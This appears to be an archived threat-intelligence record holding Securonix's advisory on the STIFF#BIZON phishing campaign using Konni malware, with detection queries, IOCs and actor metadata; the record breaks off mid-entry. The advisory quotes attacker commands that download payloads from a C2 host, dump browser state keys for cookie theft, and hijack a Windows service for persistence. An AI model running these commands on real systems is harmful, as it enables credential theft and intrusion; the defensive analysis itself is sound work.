{
	"id": "34dd9653-eaeb-409e-a620-b4861a86c978",
	"created_at": "2026-04-06T00:15:30.623027Z",
	"updated_at": "2026-04-10T13:12:03.270275Z",
	"deleted_at": null,
	"sha1_hash": "15830da9eb1ece90c6e53e04e43df3353bc18311",
	"title": "Securonix Threat Labs Initial Coverage Advisory: STIFF#BIZON Detection Using Securonix – New Attack Campaign Observed Possibly Linked to Konni/APT37 (North Korea)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4067294,
	"plain_text": "Securonix Threat Labs Initial Coverage Advisory: STIFF#BIZON Detection Using Securonix – New Attack Campaign Observed Possibly Linked to Konni/APT37 (North Korea)\r\nArchived: 2026-04-05 12:38:05 UTC\r\nBy Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nLast Updated: July 20, 2022\r\nIntroduction\r\nThe Securonix Threat Research (STR) team has been observing and investigating a new attack campaign targeting high-value targets in the Czech Republic, Poland, and other countries. STR tracks the campaign as STIFF#BIZON.\r\nSome of the tradecraft and artifacts observed by the Threat Research team as part of this ongoing campaign are known to be associated with Konni (APT37, North Korea) malicious activity (see details below).\r\nBackground\r\nKonni is a remote access trojan (RAT) that was heavily used by APT37 and contains built-in functions to elevate privileges and maintain persistence on the affected host. The malware was discovered in 2014 and has been attributed to the North Korean APT37 group [3].\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 1 of 26\r\nSTIFF#BIZON – Attack Chain: High Level Overview\r\nThe initial infiltration part of the attack chain is relatively trivial and unremarkable. The infection starts with phishing emails that attempt to lure the victim into opening a malicious attachment. In this particular case the threat actors attached a file containing the malware.\r\nThe overall attack chain can be seen in Figure 1 below:\r\nFigure 1\r\nSTIFF#BIZON: Stage 1 initial compromise\r\nThe new Konni-based malware was embedded into a phishing document as a compressed file attachment. Inside the archive are the files “missile.docx” and “_weapons.doc.lnk”.\r\nInitial compromise through malicious .lnk files is something we’ve seen with other loaders such as Bumblebee [9] and the related DogWalk [10] phishing campaigns.\r\nCode execution begins with small snippets of code embedded in the shortcut file, which run alongside the intended binary when the user double-clicks it.\r\nFigure 2\r\nThis code runs and executes Base64-encoded text appended to the end of the missile.docx file, which can be seen in Figure 3:\r\nFigure 3\r\nThe Base64 payload is executed as another PowerShell stager, which initiates C2 communication and downloads and runs both the “weapons.doc” and “wp.vbs” files.\r\nFigure 4\r\nThe final document is then opened on the victim’s computer, as seen in the figure below. The second file downloaded by the script, wp.vbs, silently runs in the background and sets stage 2 in motion with further code execution.\r\nFigure 5\r\nThe lure document was allegedly created by Ольга Божьева (Olga Bozheva) on Jun 16, 2022. The name and other metadata can be seen in Figure 5. The alleged author is known to be a war correspondent in Russia (see Figure 6.1).\r\nFigure 6\r\nFigure 6.1\r\nSTIFF#BIZON: Stage 2 loading the RAT\r\nThe wp.vbs file that was downloaded and executed in the previous section does a couple of interesting things. As seen in Figure 7 below, the malicious VBScript file creates a new scheduled task called “Office Update”. The scheduled task executes a PowerShell script encoded in Base64.\r\nFigure 7\r\nAt this point C2 communications are once again established, which provides the attacker with access to the system.\r\nSTIFF#BIZON: C2 communication\r\nOnce the attackers had access to the system, we observed the following activity and URL structures, which give us more information.\r\nDownload lure document (weapons.doc):\r\n/view.php?name=”+[Environment]::MachineName+”\u0026tp=”+[Environment]::OSVersion\r\nDownload wp.vbs:\r\n/info.php?name=”+[Environment]::MachineName+”\u0026tp=”+[Environment]::OSVersion\r\nRequest a .NET assembly from the C2 server that will be loaded into memory:\r\n/dn.php?name=’+[System.Environment]::MachineName+’\u0026prefix=qq\u0026tp=’+[System.Environment]::OSVersion\r\nExample:\r\n[System.Reflection.Assembly]::Load($buf);$ep=$bin.EntryPoint;$ep.ToString();$ep.Invoke($null,$null);\r\nSTIFF#BIZON: Capabilities\r\nTo help us understand the motivations behind the APT group and the loaded malware, we analyzed the following capabilities that were loaded onto the victim machine.\r\nWe observed the following modules being served by the threat actor:\r\nCapture.net.exe was used to create a screenshot using the Win32 GDI API and upload the gzipped result to the C2 server. This can be seen in Figures 8 and 9 below.\r\nFigure 8\r\nFigure 9\r\nThe next module loaded is chkey.net.exe, which was used to extract the state key stored in the browser’s Local State file. This state key is encrypted using DPAPI. With the state key, a threat actor (TA) can decrypt the cookie database offline, import the cookies into a machine controlled by the TA, and access any available services without MFA authentication.\r\nFigure 10\r\nFigure 11\r\nFigure 12\r\nThe next loaded module is pull.net.exe, which we observed extracting saved logins, passwords, and URLs from the victim’s browser “Login Data” file.\r\nFigure 13\r\nThe next module, shell.net.exe, provided the threat actor with an “interactive shell” that checks for and runs commands from the attacker every 10 seconds. The loaded module can be seen in Figures 14-16 below.\r\nFigure 14\r\nFigure 15\r\nFigure 16\r\nThe module shell.net.exe provided the following C2 communication command structure:\r\nReceive commands from the shell.net.exe assembly module (interactive shell):\r\n/dn.php?name=name=”+[Environment]::MachineName+”\u0026prefix=kk\r\nTransfer tools/TA files to the victim host:\r\n/dn.php?name=”+[Environment]::MachineName+”\u0026prefix=mm\r\nSend results of command execution (.NET assembly modules):\r\n/up.php?name=”+[Environment]::MachineName\r\nSTIFF#BIZON: Modus Operandi\r\nOperator activity often starts at roughly 1:00-7:00 a.m. UTC.\r\nOperators transfer tools and other files from an external system into the compromised environment compressed in .cab archives.\r\nCommands are executed through the shell.net.exe .NET assembly module.\r\nInitial recon begins:\r\ncmd /c cd /d “C:\\Users” \u0026\u0026 dir /a/o-d/s *.*\r\ncmd /c tasklist\r\ncmd /c systeminfo\r\ncmd /c wmic logicaldisk get caption,description,drivetype,filesystem,freespace,size,volumename\r\ncmd /c query session\r\nDump of browser state key (search for Edge AES state key, master key):\r\npowershell -ep bypass -command “$url=’hxxp://547857[.]c1[.]biz/dn.php?name=’+[System.Environment]::MachineName+’\u0026prefix=mm’;$client=new-object System.Net.WebClient;$rep=$client.DownloadString($url);$buf=[Convert]::FromBase64String($rep);$fn=[System.Environment]::GetEnvironmentVariable(‘temp’)`\r\n+’\\z.exe’;[System.IO.File]::WriteAllBytes($fn, $buf);”\r\ncmd /c cd /d %TEMP% \u0026\u0026 z.exe “C:\\Users\\bhenson\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State”\r\ncmd /c del /f /q “%TEMP%\\z.exe”\r\nService installation for persistence:\r\npowershell -ep bypass -command “$url=’hxxp://547857[.]c1[.]biz/dn.php?name=’+[System.Environment]::MachineName+’\u0026prefix=mm’;$rep=(New-Object System.Net.WebClient).DownloadString($url);$buf=[Convert]::FromBase64String($rep);$fn=’C:\\Users\\jalston\\AppData\\Local\\Temp\\1.cab’;[System.IO.File]::WriteAllBytes($fn, $buf);”\r\ncmd /c cd /d “C:\\Users\\REDACTED\\AppData\\Local\\Temp” \u0026\u0026 dir /a/o-d/s *.*\r\ncmd /c expand %TEMP%\\1.cab -f:* %TEMP%\r\ncmd /c cd /d “C:\\Users\\REDACTED\\AppData\\Local\\Temp” \u0026\u0026 dir /a/o-d/s *.*\r\ncmd /c del /f /q “C:\\Users\\REDACTED\\1.cab”\r\ncmd /c cd /d “C:\\Users\\REDACTED\\AppData\\Local\\Temp” \u0026\u0026 dir /a/o-d/s *.*\r\ncmd /c cd /d “C:\\Users\\REDACTED\\AppData\\Local\\Temp” \u0026\u0026 expand 1.cab -f:* %cd%\r\ncmd /c C:\\Users\\REDACTED\\AppData\\Local\\Temp\\food.bat\r\ncmd /c sc query wpcsvc\r\ncmd /c sc query wpcsvc\r\ncmd /c rundll32 “%TEMP%\\wpnprv.dll”, IIIIIIII 4 “cmd /c del /f /q C:\\Windows\\system32\\wpcsvc.*”\r\ncmd /c rundll32 “%TEMP%\\wpnprv.dll”, IIIIIIII 4 “cmd /c del /f /q C:\\Windows\\system32\\wnlsvc.*”\r\ncmd /c tasklist /m wnlsvc.dll\r\nz.exe\r\nThis executable is used to dump Chromium browser state keys. Since Chromium 80, cookies are encrypted using AES-256-GCM with a state key that is stored in the Local State file. This state key is encrypted using DPAPI. With the state key, the threat actors are able to decrypt the cookie database offline and use the cookies to access services without MFA.\r\nNote: The usage of the letter “z” in z.exe may further indicate Russian origins, as “z” has recently been used as a Russian military symbol.\r\nFigure 17\r\nFigure 18\r\nSTIFF#BIZON: Stage 4 – Analysis\r\nDuring this stage of the infection, the attacker has some control over the host and is able to download and execute commands. To further the persistence phase, a modified version of the Konni malware appears to have been used.\r\nAttackers were able to download a .cab file containing several files related to the malware (two .bat, two .dll, a .dat and an .ini file): food.bat, seed.bat, wpnprv.dll, wpcsvc.dll, wpcsvc.dat and wpcsvc.ini.\r\nLet’s take a look at each of these files in execution order.\r\nfood.bat\r\nUsed to execute seed.bat from the current user context or via user/domain credentials hardcoded in wpnprv.dll.\r\nFigure 19\r\nseed.bat\r\nThis file contains commands used to replace the legitimate Windows service “wpcsvc” (Windows Parental Controls service) with a malicious DLL, wpcsvc.dll, and encoded configuration files, wpcsvc.dat and wpcsvc.ini.\r\nFigure 20\r\nWpnprv.dll\r\nThis is used as a proxy DLL whose entry point function “IIIIIIII” executes commands depending on the parameters passed:\r\nExample: cmd /c rundll32 “C:\\Users\\username\\AppData\\Local\\Temp\\wpnprv.dll”, IIIIIIII 4 “cmd /c del /f /q C:\\Windows\\system32\\wpcsvc.dll”\r\nIf the parameter is “4”, sub_180002030 is executed.\r\nIn any other case, sub_18001B70 is executed.\r\nFigure 21\r\nIf the parameter is set to “4”, this sample DLL uses anti-debugging techniques with the WaitForDebugEvent and ContinueDebugEvent APIs to execute the passed command line.\r\nFigure 22\r\nFigure 23\r\nIf a parameter other than “4” is supplied to the sample DLL, it executes commands with higher privileges by running wusa.exe (the Windows Update Standalone Installer, located in the System32 folder), which runs as a high-integrity process by default, and spawning cmd.exe at high integrity level. This technique was leaked in 2017 by WikiLeaks as part of the “Vault 7” material [4].\r\nThe same technique implemented in PowerShell can be found in the UAC-TokenMagic.ps1 entry of the PowerShell-Suite repository [5]: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1\r\nThis technique can be seen in Figures 24 and 25:\r\nFigure 24\r\nFigure 25\r\nWpcsvc.dll, wpcsvc.dat, wpcsvc.ini\r\nThese provide several functions but are primarily used for persistence by:\r\n1. Stopping wpcsvc\r\n2. Copying wpcsvc.dll, wpcsvc.dat and wpcsvc.ini to the System32 folder\r\n3. Modifying/creating the binpath, description and autostart service settings\r\n4. Adding the service wpcsvc under the SVCHOST.EXE context:\r\nreg add “HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost” /v wpcsvc /t REG_MULTI_SZ /d “wpcsvc” /f \u003e nul\r\nand specifying the malicious DLL to be used with this service:\r\nreg add “HKLM\\SYSTEM\\CurrentControlSet\\Services\\wpcsvc\\Parameters” /v ServiceDll /t REG_EXPAND_SZ /d “%windir%\\System32\\wpcsvc.dll” /f \u003e nul\r\n5. Restarting the service wpcsvc\r\nConclusion: Connecting the dots\r\nAs shown above, the current attribution to APT37 is possible, but not 100% certain due to the dynamic nature of the artifacts and the shared opsec, tradecraft and malware variants observed. Additionally, there seems to be a direct correlation in IP addresses, hosting provider and hostnames between this attack and historical data we’ve previously seen from FancyBear/APT28 [3]. In the end, what makes this particular case interesting is the usage of Konni malware in conjunction with tradecraft similarities to APT28.\r\nSpeculation and false flags\r\nSTIFF#BIZON related activities are currently ongoing and are something the Securonix Threat Research team is tracking. It is always important to consider the possibility of false flag operations, where one APT group may be masquerading as another in order to avoid scrutiny. This is much more common with state-sponsored attacks.\r\nSecuronix mitigations and recommendations\r\nSecure credentials. Russian state-sponsored APT actors have demonstrated their ability to maintain persistence using compromised credentials [11]:\r\nUse virtualization solutions on modern hardware and software to ensure credentials are securely stored.\r\nDisable the storage of clear text passwords in LSASS memory.\r\nConsider disabling or limiting New Technology Local Area Network Manager (NTLM) and WDigest Authentication.\r\nImplement Credential Guard for Windows 10 and Server 2016 (refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012 R2, enable Protected Process Light for Local Security Authority (LSA).\r\nMinimize the Active Directory attack surface to reduce malicious ticket-granting activity. Malicious activity such as “Kerberoasting” takes advantage of Kerberos’ TGS and can be used to obtain hashed credentials that attackers attempt to crack.\r\nDeploy PowerShell script block logging to assist in detections.\r\nWhen it comes to any type of malware, Securonix strongly recommends that AV definitions as well as operating systems are patched and up to date.\r\nAvoid opening any attachments, especially those that are unexpected or come from outside the organization. Consider blocking specific extensions such as .zip or .iso archives from being delivered to the recipient.\r\nImplement application and script execution policies that limit PowerShell and VBScript execution.\r\nImplement geo-blocking policies on the firewall and blacklist unexpected countries.\r\nSecuronix detection policies\r\nSuspicious PowerShell Command From LOLbin Process Analytic\r\nSuspicious Scheduled Task Creation Run From Public Dir Analytic\r\nSuspicious wscript.exe Child Process Creation Analytic\r\nSuspicious PowerShell In .lnk File Process Pattern Analytic\r\nSuspicious Attempt To Access Browser Local State Folder CommandLine Analytic\r\nFile And Directory Enumeration CommandLine Analytic\r\nPotential System Binary Proxy Execution CommandLine Analytic\r\nSuspicious Service Modification CommandLine Analytic\r\nSuspicious Service Failure Action Modification CommandLine Analytic\r\nAnd others.\r\nHunting queries\r\n(rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR rg_functionality = “Web Server” OR rg_functionality = “Web Proxy”) AND (requesturl CONTAINS “info.php?name=” OR requesturl CONTAINS “dn.php?name=” OR requesturl CONTAINS “up.php?name=”)\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “rundll32.exe” AND resourcecustomfield1 CONTAINS “ iiiiiiii ”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND resourcecustomfield1 CONTAINS “\\AppData\\Local\\” AND resourcecustomfield1 CONTAINS “\\User Data\\Local State”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction ENDS WITH “Written” OR deviceaction = “File created”) AND destinationprocessname ENDS WITH “powershell.exe” AND filepath CONTAINS “\\appdata\\local\\temp\\rr” AND filepath CONTAINS “.tar.gz”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND resourcecustomfield1 CONTAINS “cd /d” AND resourcecustomfield1 CONTAINS “ dir ” AND resourcecustomfield1 CONTAINS “ /a/o-d/s ” AND resourcecustomfield1 CONTAINS “ *.”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “expand.exe” AND resourcecustomfield1 CONTAINS “.cab” AND resourcecustomfield1 CONTAINS “-f:” AND sourceprocessname ENDS WITH “cmd.exe”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “rundll32.exe” AND resourcecustomfield1 CONTAINS “cmd.exe” AND resourcecustomfield1 CONTAINS “/c”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “reg.exe” AND resourcecustomfield1 CONTAINS “ add ” AND resourcecustomfield1 CONTAINS “console” AND resourcecustomfield1 CONTAINS “codepage” AND resourcecustomfield1 CONTAINS “65001”\r\n(rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”)) AND (destinationprocessname ENDS WITH “reg.exe” AND resourcecustomfield1 CONTAINS “ add ”) AND ((resourcecustomfield1 CONTAINS “system\\currentcontrolset\\services” AND resourcecustomfield1 CONTAINS “reg_expand_sz”) OR (resourcecustomfield1 CONTAINS “software\\microsoft\\windows nt\\currentversion\\svchost” AND resourcecustomfield1 CONTAINS “reg_multi_sz”))\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “sc.exe” AND resourcecustomfield1 CONTAINS “ failure ” AND resourcecustomfield1 CONTAINS “ reset=” AND resourcecustomfield1 CONTAINS “ actions=”\r\nSTIFF#BIZON – MITRE ATT\u0026CK techniques\r\nTactic: Technique\r\nInitial Access: T1566.001 Spearphishing Attachment\r\nExecution: T1059.001 PowerShell; T1059.003 Windows Command Shell; T1059.005 Visual Basic; T1053.005 Scheduled Task; T1569.002 Service Execution; T1204.002 Malicious File\r\nPersistence: T1543.003 Windows Service; T1053 Scheduled Task\r\nPrivilege Escalation: T1134.001 Token Impersonation/Theft; T1543.003 Windows Service\r\nDefense Evasion: T1548.002 Bypass User Account Control; T1134.001 Token Impersonation/Theft; T1070.004 File Deletion; T1027.005 Indicator Removal from Tools\r\nCredential Access: T1555.003 Credentials from Web Browsers; T1606.001 Web Cookies; T1539 Steal Web Session Cookie\r\nDiscovery: T1082 System Information Discovery; T1057 Process Discovery; T1007 System Service Discovery; T1033 System Owner/User Discovery\r\nCollection: T1560.003 Archive via Custom Method; T1113 Screen Capture; T1119 Automated Collection\r\nCommand and Control: T1071.001 Web Protocols; T1132.001 Standard Encoding; T1105 Ingress Tool Transfer\r\nExfiltration: T1020 Automated Exfiltration; T1041 Exfiltration Over C2 Channel\r\nSTIFF#BIZON – Indicators of compromise\r\nHost Communication\r\n185[.]176.43.106\r\n547857[.]c1[.]biz\r\n65487[.]c1[.]biz\r\nFile Name SHA256 (Dynamic/Custom implants)\r\nReferences\r\n[1] APT28: At the Center of the Storm, January 2017, https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf\r\n[2] CrowdStrike’s work with the Democratic National Committee: Setting the record straight, June 5, 2020, https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\n[3] New variant of Konni malware used in campaign targeting Russia, August 23, 2021, https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/\r\n[4] Vault 7: CIA Hacking Tools Revealed, March 7, 2017, https://wikileaks.org/ciav7p1/\r\n[5] PowerShell-Suite/UAC-TokenMagic.ps1, July 15, 2017, https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1\r\n[6] Indicators of Compromise for Malware used by APT28, October 4, 2018, https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf\r\n[7] A deeper look at hacking groups and malware targeting Ukraine, April 27, 2022, https://therecord.media/a-deeper-look-at-hacking-groups-and-malware-targeting-ukraine/\r\n[8] APT Attackers Flying More False Flags Than Ever, March 17, 2016, https://threatpost.com/apt-attackers-flying-more-false-flags-than-ever/116814/\r\n[9] Securonix Threat Labs Initial Coverage Advisory: Analysis and Detection of BumbleBee Loader Using Securonix, July 5, 2022, https://www.securonix.com/blog/securonix-threat-labs-initial-coverage-advisory-analysis-and-detection-of-bumblebee-loader-using-securonix/\r\n[10] Securonix Threat Labs Initial Coverage Advisory: Detecting Microsoft MSDT “DogWalk” .diagcab 0-Day Using Securonix, June 09, 2022, https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/\r\n[11] CISA Alert: Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure, March 01, 2022, https://www.cisa.gov/uscert/ncas/alerts/aa22-011a\r\n[13] North Korea recognizes “DPR” and “LPR”, July 13, 2022, https://ukrainetoday.org/2022/07/13/north-korea-recognizes-dpr/\r\nSource: https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/"
	],
	"report_names": [
		"stiffbizon-detection-new-attack-campaign-observed"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4",
			"created_at": "2025-08-07T02:03:25.096857Z",
			"updated_at": "2026-04-10T02:00:03.659118Z",
			"deleted_at": null,
			"main_name": "NICKEL JUNIPER",
			"aliases": [
				"Konni",
				"OSMIUM ",
				"Opal Sleet "
			],
			"source_name": "Secureworks:NICKEL JUNIPER",
			"tools": [
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b43c8747-c898-448a-88a9-76bff88e91b5",
			"created_at": "2024-02-02T02:00:04.058535Z",
			"updated_at": "2026-04-10T02:00:03.545252Z",
			"deleted_at": null,
			"main_name": "Opal Sleet",
			"aliases": [
				"Konni",
				"Vedalia",
				"OSMIUM"
			],
			"source_name": "MISPGALAXY:Opal Sleet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"CHROMIUM",
				"Charcoal Typhoon",
				"Earth Lusca",
				"FISHMONGER",
				"Red Dev 10",
				"Red Scylla",
				"RedHotel",
				"Tag-22"
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
